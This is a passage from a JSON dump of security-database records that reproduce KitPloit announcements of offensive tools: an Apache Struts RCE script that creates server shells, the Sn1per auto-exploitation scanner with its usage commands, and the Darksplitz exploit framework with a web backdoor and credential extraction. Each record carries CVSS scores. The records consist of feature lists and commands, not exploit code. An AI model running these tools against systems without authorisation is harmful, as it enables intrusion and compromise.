)\n * [Sputnik](<https://github.com/mitchmoser/sputnik> \"Sputnik\" )\n * [ThreatConnect Integrated ](<https://chrome.google.com/webstore/detail/threatconnect-integrated/lblgcphpihpadjdpjgjnnoikjdjcnkbh> \"ThreatConnect Integrated \" )[Chrome](<https://www.kitploit.com/search/label/Chrome> \"Chrome\" ) Extension\n * [ThreatPinch Lookup](<https://github.com/cloudtracer/ThreatPinchLookup> \"ThreatPinch Lookup\" )\n * [VTchromizer](<https://chrome.google.com/webstore/detail/vtchromizer/efbjojhplkelaegfbieplglfidafgoka> \"VTchromizer\" )\n \n**How to build (for developers)** \nThis browser extension is written in [TypeScript](<https://www.typescriptlang.org/> \"TypeScript\" ) and built by [webpack](<https://webpack.js.org/> \"webpack\" ). \nTypeScript files will start out in `src` directory, run through the TypeScript compiler, then webpack, and end up in JavaScript files in `dist` directory. \n\n \n \n git clone https://github.com/ninoseki/mitaka.git\n cd mitaka\n npm install\n npm run test\n npm run build\n\nFor loading an unpacked extension, please follow the procedures described at <https://developer.chrome.com/extensions/getstarted>. \n \n**Misc** \nMitaka/\u898b\u305f\u304b means \"Have you seen it?\" in Japanese. \n \n \n\n\n**[Download Mitaka](<https://github.com/ninoseki/mitaka> \"Download Mitaka\" )**\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-09-21T12:00:00", "type": "kitploit", "title": "Mitaka - A Browser Extension For OSINT Search", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2019-09-21T12:00:07", "id": "KITPLOIT:8708017483803645203", "href": "http://www.kitploit.com/2019/09/mitaka-browser-extension-for-osint.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-23T15:18:09", "description": " \n\n\n[](<https://3.bp.blogspot.com/-MKbYVQXvBz0/W4LReq3_cJI/AAAAAAAAMQ0/WgNhU5_o5cIwFs69p3T2YIf3xObo_rAtgCLcBGAs/s1600/Apache-Struts-v3_1_screen.png>)\n\n \nScript contains the fusion of 3 RCE vulnerabilities on ApacheStruts, it also has the ability to create server shells. \n \n**SHELL** \n**php** `finished` \n**jsp** `process` \n \n**CVE ADD** \n**CVE-2013-2251** `'action:', 'redirect:' and 'redirectAction'` \n**CVE-2017-5638** `Content-Type` \n**CVE-2018-11776** `'redirect:' and 'redirectAction'` \n \n \n\n\n**[Download Apache-Struts-v3](<https://github.com/s1kr10s/Apache-Struts-v3>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-08-26T21:14:00", "type": "kitploit", "title": "Apache Struts v3 - Tool To Exploit 3 RCE Vulnerabilities On ApacheStruts", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2251", "CVE-2017-5638", "CVE-2018-11776"], "modified": "2018-08-26T21:14:01", "id": "KITPLOIT:4611207874033525364", "href": "http://www.kitploit.com/2018/08/apache-struts-v3-tool-to-exploit-3-rce.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-04T12:36:49", "description": "[](<https://1.bp.blogspot.com/-Poffj1hNPBk/XNXfkZuyGfI/AAAAAAAAO0U/k4nQgdLXOoEZMOGlGb3wgnx8HgQzEtacgCLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [automated scanner](<https://www.kitploit.com/search/label/Automated%20scanner> \"automated scanner\" ) that can be used during a [penetration test](<https://www.kitploit.com/search/label/Penetration%20Test> \"penetration test\" ) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes. For more information regarding Sn1per Professional, go to [https://xerosecurity.com](<https://xerosecurity.com/> \"https://xerosecurity.com\" ).\n\n \n**SN1PER PROFESSIONAL FEATURES:** \n \n**Professional reporting interface** \n \n\n\n[](<https://2.bp.blogspot.com/-HnwS8O0KEik/XNXfrGJWPeI/AAAAAAAAO0Y/94Hl4CC3M_kytYKkKldzXNviz4ff92TVACLcBGAs/s1600/Sn1per_8.png>)\n\n \n**Slideshow for all gathered screenshots** \n \n\n\n[](<https://2.bp.blogspot.com/-coOpsZX0XMM/XNXfuVNicUI/AAAAAAAAO0c/Wd2EQSAcI4Uti3bkaa1kxqajpStfjTK0ACLcBGAs/s1600/Sn1per_9.png>)\n\n \n**Searchable and sortable DNS, IP and open port database** \n \n\n\n[](<https://4.bp.blogspot.com/-bfzb6vLbCks/XNXfy5vfkTI/AAAAAAAAO0g/9aO7_9YKrqMyWK3PehtfItlm4DZ6KWR4gCLcBGAs/s1600/Sn1per_10.png>)\n\n \n**Detailed host reports** \n \n\n\n[](<https://4.bp.blogspot.com/-JbxR5Z-2O_4/XNXf2YbT_DI/AAAAAAAAO0o/w8Hin6Cbf1Ue4QbVW70T2-r1Rj82wDsSQCLcBGAs/s1600/Sn1per_11.png>)\n\n \n**NMap HTML host reports** \n \n\n\n[](<https://2.bp.blogspot.com/-TYr4tFOy7Y4/XNXf7dXeSII/AAAAAAAAO0w/0YMKst5KHGoygojHG2r6tJxqkg2a-w1YQCLcBGAs/s1600/Sn1per_12.png>)\n\n \n**Quick links to online recon tools and Google hacking queries** \n \n\n\n[](<https://1.bp.blogspot.com/-FNe1YF5mg68/XNXgAPQOAEI/AAAAAAAAO00/5uuuQo2KqRgwpTE11Z-U6p_XGetjCf9vgCLcBGAs/s1600/Sn1per_13.png>)\n\n \n**Takeovers and Email Security** \n \n\n\n[](<https://2.bp.blogspot.com/-FNah2OwM_nU/XNXgEeJZG9I/AAAAAAAAO08/A7lu1554nJ0GpEOj7AtdZ_emSoyq5lBxQCLcBGAs/s1600/Sn1per_14.png>)\n\n \n**HTML5 Notepad** \n \n\n\n[](<https://2.bp.blogspot.com/-DHOnECOz-T0/XNXgH_QX4JI/AAAAAAAAO1E/s0bFVC-Uf_87tBFY2AJwiJyHgKJ8VgKXQCLcBGAs/s1600/Sn1per_15.png>)\n\n \n**ORDER SN1PER PROFESSIONAL:** \nTo obtain a Sn1per Professional license, go to [https://xerosecurity.com](<https://xerosecurity.com/> \"https://xerosecurity.com\" ). \n \n**DEMO VIDEO:** \n \n \n\n\n[](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>)\n\n \n \n**SN1PER COMMUNITY FEATURES:** \n\n\n * Automatically collects basic recon (ie. whois, ping, DNS, etc.)\n * Automatically launches Google hacking queries against a target domain\n * Automatically enumerates open ports via NMap port scanning\n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers\n * Automatically checks for sub-domain hijacking\n * Automatically runs targeted NMap scripts against open ports\n * Automatically runs targeted Metasploit scan and exploit modules\n * Automatically scans all web applications for common vulnerabilities\n * Automatically brute forces ALL open services\n * Automatically test for anonymous FTP access\n * Automatically runs WPScan, Arachni and Nikto for all web services\n * Automatically enumerates NFS shares\n * Automatically test for anonymous LDAP access\n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities\n * Automatically enumerate SNMP community strings, services and users\n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067\n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers\n * Automatically tests for open X11 servers\n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds\n * Performs high level enumeration of multiple hosts and subnets\n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting\n * Automatically gathers screenshots of all web sites\n * Create individual workspaces to store all scan output\n \n**EXPLOITS:** \n\n\n * Drupal RESTful Web Services unserialize() SA-CORE-2019-003\n * Apache Struts: S2-057 (CVE-2018-11776): Security updates available for Apache Struts\n * Drupal: CVE-2018-7600: [Remote Code Execution](<https://www.kitploit.com/search/label/Remote%20Code%20Execution> \"Remote Code Execution\" ) \\- SA-CORE-2018-002\n * GPON Routers - Authentication Bypass / [Command Injection](<https://www.kitploit.com/search/label/Command%20Injection> \"Command Injection\" ) CVE-2018-10561\n * MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption\n * Apache Tomcat: Remote Code Execution (CVE-2017-12617)\n * Oracle WebLogic wls-wsat Component Deserialization Remote Code Execution CVE-2017-10271\n * Apache Struts Content-Type arbitrary command execution (CVE-2017-5638)\n * Apache Struts 2 Framework Checks - REST plugin with XStream handler (CVE-2017-9805)\n * Apache Struts Content-Type arbitrary command execution (CVE-2017-5638)\n * Microsoft IIS WebDav ScStoragePathFromUrl Overflow CVE-2017-7269\n * ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability CVE-2015-8249\n * Shellshock Bash Shell remote code execution CVE-2014-6271\n * HeartBleed OpenSSL Detection CVE-2014-0160\n * MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387)\n * Tomcat Application Manager Default Ovwebusr Password Vulnerability CVE-2009-3843\n * MS08-067 Microsoft Server Service Relative Path Stack Corruption\n * Webmin File Disclosure CVE-2006-3392\n * VsFTPd 2.3.4 Backdoor\n * ProFTPd 1.3.3C Backdoor\n * MS03-026 Microsoft RPC DCOM Interface Overflow\n * DistCC Daemon Command Execution\n * JBoss Java De-Serialization\n * HTTP Writable Path PUT/DELETE File Access\n * Apache Tomcat User Enumeration\n * Tomcat Application Manager Login Bruteforce\n * Jenkins-CI Enumeration\n * HTTP WebDAV Scanner\n * Android Insecure ADB\n * Anonymous FTP Access\n * PHPMyAdmin Backdoor\n * PHPMyAdmin Auth Bypass\n * OpenSSH User Enumeration\n * LibSSH Auth Bypass\n * SMTP User Enumeration\n * Public NFS Mounts\n \n**KALI LINUX INSTALL:** \n\n \n \n bash install.sh\n\n \n**UBUNTU/DEBIAN/PARROT INSTALL:** \n\n \n \n bash install_debian_ubuntu.sh\n\n \n**DOCKER INSTALL:** \n\n \n \n docker build Dockerfile\n\n \n**USAGE:** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON + FULL PORT SCAN + BRUTE FORCE\n sniper -t|--target <TARGET> -o|--osint -re|--recon -fp|--fullportonly -b|--bruteforce\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] FLYOVER MODE\n sniper -t|--target <TARGET> -m|--mode flyover -w|--workspace <WORKSPACE_ALIAS>\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TA RGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT HTTP MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT HTTPS MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] WEBSCAN MODE\n sniper -t|--target <TARGET> -m|--mode webscan\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] LOOT REIMPORTALL FUNCTION\n sniper -w <WORKSPACE_ALIAS& gt; --reimportall\n \n [*] DELETE WORKSPACE\n sniper -w <WORKSPACE_ALIAS> -d\n \n [*] DELETE HOST FROM WORKSPACE\n sniper -w <WORKSPACE_ALIAS> -t <TARGET> -dh\n \n [*] SCHEDULED SCANS'\n sniper -w <WORKSPACE_ALIAS> -s daily|weekly|monthly'\n \n [*] SCAN STATUS\n sniper --status\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n**MODES:** \n\n\n * **NORMAL:** Performs basic scan of targets and open ports using both active and passive checks for optimal performance.\n * **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.\n * **FLYOVER:** Fast multi-threaded high level scans of multiple targets (useful for collecting high level data on many hosts quickly).\n * **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.\n * **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.\n * **DISCOVER:** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.\n * **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.\n * **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.\n * **WEB:** Adds full automatic web application scans to the results (port 80/tcp &amp; 443/tcp only). Ideal for web applications but may increase scan time significantly.\n * **WEBPORTHTTP:** Launches a full HTTP web application scan against a specific host and port.\n * **WEBPORTHTTPS:** Launches a full HTTPS web application scan against a specific host and port.\n * **WEBSCAN:** Launches a full HTTP &amp; HTTPS web application scan against via Burpsuite and Arachni.\n \n**SAMPLE REPORT:** \n<https://gist.github.com/1N3/8214ec2da2c91691bcbc> \n \n \n\n\n**[Download Sn1per](<https://github.com/1N3/Sn1per> \"Download Sn1per\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2019-05-12T13:09:00", "type": "kitploit", "title": "Sn1per v7.0 - Automated Pentest Framework For Offensive Security Experts", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3392", "CVE-2009-3843", "CVE-2014-0160", "CVE-2014-6271", "CVE-2015-8249", "CVE-2017-10271", "CVE-2017-12617", "CVE-2017-5638", "CVE-2017-7269", "CVE-2017-9805", "CVE-2018-10561", "CVE-2018-11776", "CVE-2018-7600"], "modified": "2019-05-12T13:09:05", "id": "KITPLOIT:7013881512724945934", "href": "http://www.kitploit.com/2019/05/sn1per-v70-automated-pentest-framework.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-07-04T12:36:55", "description": "[](<https://2.bp.blogspot.com/-WrSl3k8acz8/XKK-mOdvWPI/AAAAAAAAOaA/AhYa9ilCzBkxcfAhNbVH3l5YsgRSvL6tgCLcBGAs/s1600/Darksplitz.png>)\n\n \nThis tools is continued from Nefix, DirsPy and Xmasspy project. \n \n**Installation** \nWill work fine in the [debian](<https://www.kitploit.com/search/label/Debian> \"debian\" ) shade operating system, like Backbox, Ubuntu or Kali linux. \n\n\n 1. `$ git clone https://github.com/koboi137/darksplitz`\n 2. `$ cd darksplitz/`\n 3. `$ sudo ./install.sh`\n \n**Features** \n\n\n * Extract [mikrotik](<https://www.kitploit.com/search/label/MikroTik> \"mikrotik\" ) credential (user.dat)\n * Password generator\n * Reverse IP lookup\n * Mac address sniffer\n * Online md5 cracker\n * Mac address lookup\n * Collecting url from web.archive.org\n * Web [backdoor](<https://www.kitploit.com/search/label/Backdoor> \"backdoor\" ) (Dark Shell)\n * Winbox exploit (CVE-2018-14847)\n * ChimeyRed exploit for mipsbe (Mikrotik)\n * Exploit web application\n * Mass apple dos (CVE-2018-4407)\n * Libssh exploit (CVE-2018-10933)\n * Discovering Mikrotik device\n * Directory scanner\n * Subdomain scanner\n * Mac address scanner\n * Mac address pinger\n * Vhost [scanner](<https://www.kitploit.com/search/label/Scanner> \"scanner\" ) (bypass cloudflare)\n * Mass [bruteforce](<https://www.kitploit.com/search/label/Bruteforce> \"bruteforce\" ) (wordpress)\n * Interactive msfrpc client\n \n**Exploit web application** \n\n\n * plUpload file upload\n * jQuery file upload (CVE-2018-9206)\n * Laravel (.env)\n * sftp-config.json (misc)\n * Wordpress register (enable)\n * elfinder file upload\n * Drupal 7 exploit (CVE-2018-7600)\n * Drupal 8 exploit (CVE-2018-7600)\n * com_fabrik exploit (joomla)\n * gravityform plugin file upload (wordpress)\n * geoplace3 plugin file upload (wordpress)\n * peugeot-music plugin file upload (wordpress)\n \n**Notes** \nThis tool will work fine under root, because scapy module and other need root user to access more features. But you can run as user too in some features. ;) \n \n \n\n\n**[Download Darksplitz](<https://github.com/koboi137/darksplitz> \"Download Darksplitz\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-04-04T21:12:00", "type": "kitploit", "title": "Darksplitz - Exploit Framework", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10933", "CVE-2018-14847", "CVE-2018-4407", "CVE-2018-7600", "CVE-2018-9206"], "modified": "2019-04-04T21:12:09", "id": "KITPLOIT:5494076556436489947", "href": "http://www.kitploit.com/2019/04/darksplitz-exploit-framework.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-23T15:18:18", "description": "[](<https://4.bp.blogspot.com/-P3_9VWnPhLw/WzvPRBF6q3I/AAAAAAAALtk/nE4XtcDGmXELo4KLTzEDoCiNMEgF0VJAACLcBGAs/s1600/Sn1per_1_Sn1per.jpeg>)\n\n \n\n\nSn1per Community Edition is an [automated scanner](<https://www.kitploit.com/search/label/Automated%20scanner>) that can be used during a [penetration test](<https://www.kitploit.com/search/label/Penetration%20Test>) to enumerate and scan for vulnerabilities. Sn1per Professional is Xero Security's premium reporting addon for Professional Penetration Testers, Bug Bounty Researchers and Corporate Security teams to manage large environments and pentest scopes.\n\n \n**SN1PER PROFESSIONAL FEATURES:** \n \n**Professional reporting interface** \n \n\n\n[](<https://3.bp.blogspot.com/-CUaHGxKs7i8/WzvPDvnvnUI/AAAAAAAALtg/6NzvIUFvET0YO8X9SXkxbSXD51R9dgn_QCLcBGAs/s1600/Sn1per_8.png>)\n\n \n**Slideshow for all gathered screenshots** \n \n\n\n[](<https://3.bp.blogspot.com/-ElnqBSUrveU/WzvPZw0s4FI/AAAAAAAALto/xOUximDoNkMni5XhkzmMDnI9caTUWdo3gCLcBGAs/s1600/Sn1per_9.png>)\n\n \n**Searchable and sortable DNS, IP and open port database** \n \n\n\n[](<https://3.bp.blogspot.com/-U5MHC2iK1ag/WzvPfoIz6nI/AAAAAAAALts/m-GOz4roSSEhYjSeZgakgEJxo4-xCSlIQCLcBGAs/s1600/Sn1per_10.png>)\n\n \n \n**Categorized host reports** \n \n\n\n[](<https://4.bp.blogspot.com/-b82btbNLylE/WzvPj6ds37I/AAAAAAAALt0/KgxDw1g6rCgCuDamA3v_GBIHTAs-No2DwCLcBGAs/s1600/Sn1per_11.png>)\n\n \n \n**Quick links to online recon tools and Google hacking queries** \n \n\n\n[](<https://4.bp.blogspot.com/-eB0eLBg1-Xs/WzvPsgtbmGI/AAAAAAAALt8/FSkOuUJlOb0YXRetzL4TYbuLeOmRaQtOwCLcBGAs/s1600/Sn1per_12.png>)\n\n \n**Personalized notes field for each host** \n \n\n\n[](<https://1.bp.blogspot.com/-4SndSkZX88U/WzvPxUain4I/AAAAAAAALuE/x7ZucGGcTPIOGerWwlbWvXrFVosouiOhwCLcBGAs/s1600/Sn1per_13.png>)\n\n \n \n**DEMO VIDEO:** \n[](<https://asciinema.org/a/IDckE48BNSWQ8TV8yEjJjjMNm>) \n \n**SN1PER COMMUNITY FEATURES:** \n\n\n * * Automatically collects basic recon (ie. whois, ping, DNS, etc.)\n * Automatically launches Google hacking queries against a target domain\n * Automatically enumerates open ports via NMap port scanning\n * Automatically brute forces sub-domains, gathers DNS info and checks for zone transfers\n * Automatically checks for sub-domain hijacking\n * Automatically runs targeted NMap scripts against open ports\n * Automatically runs targeted Metasploit scan and exploit modules\n * Automatically scans all web applications for common vulnerabilities\n * Automatically brute forces ALL open services\n * Automatically test for anonymous FTP access\n * Automatically runs WPScan, Arachni and Nikto for all web services\n * Automatically enumerates NFS shares\n * Automatically test for anonymous LDAP access\n * Automatically enumerate SSL/TLS ciphers, protocols and vulnerabilities\n * Automatically enumerate SNMP community strings, services and users\n * Automatically list SMB users and shares, check for NULL sessions and exploit MS08-067\n * Automatically exploit vulnerable JBoss, Java RMI and Tomcat servers\n * Automatically tests for open X11 servers\n * Auto-pwn added for Metasploitable, ShellShock, MS08-067, Default Tomcat Creds\n * Performs high level enumeration of multiple hosts and subnets\n * Automatically integrates with Metasploit Pro, MSFConsole and Zenmap for reporting\n * Automatically gathers screenshots of all web sites\n * Create individual workspaces to store all scan output\n \n**AUTO-PWN:** \n\n\n * Drupal Drupalgedon2 RCE CVE-2018-7600\n * GPON Router RCE CVE-2018-10561\n * [Apache Struts](<https://www.kitploit.com/search/label/Apache%20Struts>) 2 RCE CVE-2017-5638\n * Apache Struts 2 RCE CVE-2017-9805\n * Apache Jakarta RCE CVE-2017-5638\n * Shellshock GNU Bash RCE CVE-2014-6271\n * HeartBleed OpenSSL Detection CVE-2014-0160\n * Default Apache Tomcat Creds CVE-2009-3843\n * MS Windows SMB RCE MS08-067\n * Webmin File Disclosure CVE-2006-3392\n * [Anonymous FTP](<https://www.kitploit.com/search/label/Anonymous%20FTP>) Access\n * PHPMyAdmin Backdoor RCE\n * PHPMyAdmin Auth Bypass\n * JBoss Java De-Serialization RCE's\n \n**KALI LINUX INSTALL:** \n\n \n \n ./install.sh\n\n \n**DOCKER INSTALL:** \nCredits: @menzow \nDocker Install: <https://github.com/menzow/sn1per-docker> \nDocker Build: <https://hub.docker.com/r/menzo/sn1per-docker/builds/bqez3h7hwfun4odgd2axvn4/> \nExample usage: \n\n \n \n $ docker pull menzo/sn1per-docker\n $ docker run --rm -ti menzo/sn1per-docker sniper menzo.io\n\n \n**USAGE:** \n\n \n \n [*] NORMAL MODE\n sniper -t|--target <TARGET>\n \n [*] NORMAL MODE + OSINT + RECON\n sniper -t|--target <TARGET> -o|--osint -re|--recon\n \n [*] STEALTH MODE + OSINT + RECON\n sniper -t|--target <TARGET> -m|--mode stealth -o|--osint -re|--recon\n \n [*] DISCOVER MODE\n sniper -t|--target <CIDR> -m|--mode discover -w|--workspace <WORSPACE_ALIAS>\n \n [*] SCAN ONLY SPECIFIC PORT\n sniper -t|--target <TARGET> -m port -p|--port <portnum>\n \n [*] FULLPORTONLY SCAN MODE\n sniper -t|--target <TARGET> -fp|--fullportonly\n \n [*] PORT SCAN MODE\n sniper -t|--target <TARGET> -m|--mode port -p|--port <PORT_NUM>\n \n [*] WEB MODE - PORT 80 + 443 ONLY!\n sniper -t|--target <TARGET> -m|--mode web\n \n [*] HTTP WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttp -p|--port <port>\n \n [*] HTTPS WEB PORT MODE\n sniper -t|--target <TARGET> -m|--mode webporthttps -p|--port <port>\n \n [*] ENABLE BRUTEFORCE\n sniper -t|--target <TARGET> -b|--bruteforce\n \n [*] AIRSTRIKE MODE\n sniper -f|--file /full/path/to/targets.txt -m|--mode airstrike\n \n [*] NUKE MODE WITH TARGET LIST, BRUTEFORCE ENABLED, FULLPORTSCAN ENABLED, OSINT ENABLED, RECON ENABLED, WORKSPACE & LOOT ENABLED\n sniper -f--file /full/path/to/targets.txt -m|--mode nuke -w|--workspace <WORKSPACE_ALIAS>\n \n [*] ENABLE LOOT IMPORTING INTO METASPLOIT\n sniper -t|--target <TARGET>\n \n [*] LOOT REIMPORT FUNCTION\n sniper -w <WORKSPACE_ALIAS> --reimport\n \n [*] UPDATE SNIPER\n sniper -u|--update\n\n \n**MODES:** \n\n\n * **NORMAL:** Performs basic scan of targets and open ports using both active and passive checks for optimal performance.\n * **STEALTH:** Quickly enumerate single targets using mostly non-intrusive scans to avoid WAF/IPS blocking.\n * **AIRSTRIKE:** Quickly enumerates open ports/services on multiple hosts and performs basic fingerprinting. To use, specify the full location of the file which contains all hosts, IPs that need to be scanned and run ./sn1per /full/path/to/targets.txt airstrike to begin scanning.\n * **NUKE:** Launch full audit of multiple hosts specified in text file of choice. Usage example: ./sniper /pentest/loot/targets.txt nuke.\n * **DISCOVER:** Parses all hosts on a subnet/CIDR (ie. 192.168.0.0/16) and initiates a sniper scan against each host. Useful for internal network scans.\n * **PORT:** Scans a specific port for vulnerabilities. Reporting is not currently available in this mode.\n * **FULLPORTONLY:** Performs a full detailed port scan and saves results to XML.\n * **WEB:** Adds full automatic web application scans to the results (port 80/tcp &amp; 443/tcp only). Ideal for web applications but may increase scan time significantly.\n * **WEBPORTHTTP:** Launches a full HTTP web application scan against a specific host and port.\n * **WEBPORTHTTPS:** Launches a full HTTPS web application scan against a specific host and port.\n * **UPDATE:** Checks for updates and upgrades all components used by sniper.\n * **REIMPORT:** Reimport all workspace files into Metasploit and reproduce all reports.\n * **RELOAD:** Reload the master workspace report.\n \n**SAMPLE REPORT:** \n<https://gist.github.com/1N3/8214ec2da2c91691bcbc> \n \n \n\n\n**[Download Sn1per v5.0](<https://github.com/1N3/Sn1per>)**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-07-05T13:45:00", "type": "kitploit", "title": "Sn1per v5.0 - Automated Pentest Recon Scanner", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, 